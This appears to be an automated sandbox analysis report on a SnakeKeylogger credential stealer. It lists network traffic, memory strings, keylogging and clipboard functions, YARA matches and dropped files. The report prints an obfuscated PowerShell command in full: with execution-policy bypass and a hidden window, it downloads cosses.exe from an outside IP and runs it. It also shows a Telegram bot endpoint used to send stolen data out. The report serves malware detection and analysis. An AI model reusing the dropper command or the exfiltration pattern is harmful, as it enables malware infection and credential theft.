Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /346/cosses.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.12.89.24Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: powershell.exe, 00000003.00000002.981931540.0000000005393000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.24/346/cosses.e
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.24/346/cosses.exe
Source: powershell.exe, 00000003.00000002.989978831.0000000007555000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.89.24/346/cosses.exeW
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com0
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.000000000259E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.2104403601.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: cossess.exe, 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: powershell.exe, 00000003.00000002.989916435.0000000007480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: svchost.exe, 00000009.00000002.2105524983.0000023D37600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.9.dr, qmgr.db.9.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.981931540.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.981931540.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: cossess.exe, 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000009.00000003.1202964660.0000023D373B0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000003.00000002.981931540.00000000050C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.989978831.0000000007527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comturesdowsPowerShell/v1.0/Modules/AppvClient/icrosoft.AppV.AppVClientPowerShell
Source: powershell.exe, 00000003.00000002.988836899.0000000005FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.9.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: cossess.exe, 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 6.2.cossess.exe.1540000.1.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00584164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

6_2_00584164

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00584164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

6_2_00584164

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00583F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

6_2_00583F66

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0057001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

6_2_0057001C

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0059CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

6_2_0059CABC

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"			Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: This is a third-party compiled AutoIt script.	6_2_00513B3A
Source: cossess.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: cossess.exe, 00000006.00000000.950280895.00000000005C4000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_786b056f-6
Source: cossess.exe, 00000006.00000000.950280895.00000000005C4000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_12d5fabd-1
Source: cossess.exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_56c02c99-e
Source: cossess.exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_69bdf7d8-c
Source: cosses[1].exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e9999f6f-e
Source: cosses[1].exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_9df61bdc-a

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\cossess.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0057A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

6_2_0057A1EF

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00568310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

6_2_00568310

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_005751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

6_2_005751BD

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0051E6A0	6_2_0051E6A0
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0053D975	6_2_0053D975
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0051FCE0	6_2_0051FCE0
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005321C5	6_2_005321C5
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005462D2	6_2_005462D2
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005903DA	6_2_005903DA
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0054242E	6_2_0054242E
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005325FA	6_2_005325FA
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0056E616	6_2_0056E616
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005266E1	6_2_005266E1
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0054878F	6_2_0054878F
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00590857	6_2_00590857
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00546844	6_2_00546844
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00528808	6_2_00528808
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00578889	6_2_00578889
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0053CB21	6_2_0053CB21
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00546DB6	6_2_00546DB6
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00526F9E	6_2_00526F9E
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00523030	6_2_00523030
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0053F1D9	6_2_0053F1D9
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00533187	6_2_00533187
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00511287	6_2_00511287
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00531484	6_2_00531484
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00525520	6_2_00525520
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00537696	6_2_00537696
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00525760	6_2_00525760
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00531978	6_2_00531978
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00549AB5	6_2_00549AB5
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00597DDB	6_2_00597DDB
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00531D90	6_2_00531D90
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0053BDA6	6_2_0053BDA6
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_0051DF00	6_2_0051DF00
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_00523FE0	6_2_00523FE0
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_015A1990	6_2_015A1990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0234C168	7_2_0234C168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_023427B9	7_2_023427B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0234CAB0	7_2_0234CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_023419B8	7_2_023419B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02347E68	7_2_02347E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02344F08	7_2_02344F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0234CAA2	7_2_0234CAA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0234B9E0	7_2_0234B9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0234B9D0	7_2_0234B9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02347E59	7_2_02347E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02344EF8	7_2_02344EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02342DD1	7_2_02342DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A915F8	7_2_05A915F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A94500	7_2_05A94500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A91C58	7_2_05A91C58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A97770	7_2_05A97770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A96998	7_2_05A96998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9ED80	7_2_05A9ED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A915EA	7_2_05A915EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9CDE0	7_2_05A9CDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9CDD7	7_2_05A9CDD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9C527	7_2_05A9C527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A90D3A	7_2_05A90D3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9C530	7_2_05A9C530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9ED70	7_2_05A9ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A90D48	7_2_05A90D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9048A	7_2_05A9048A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9BC80	7_2_05A9BC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A90498	7_2_05A90498
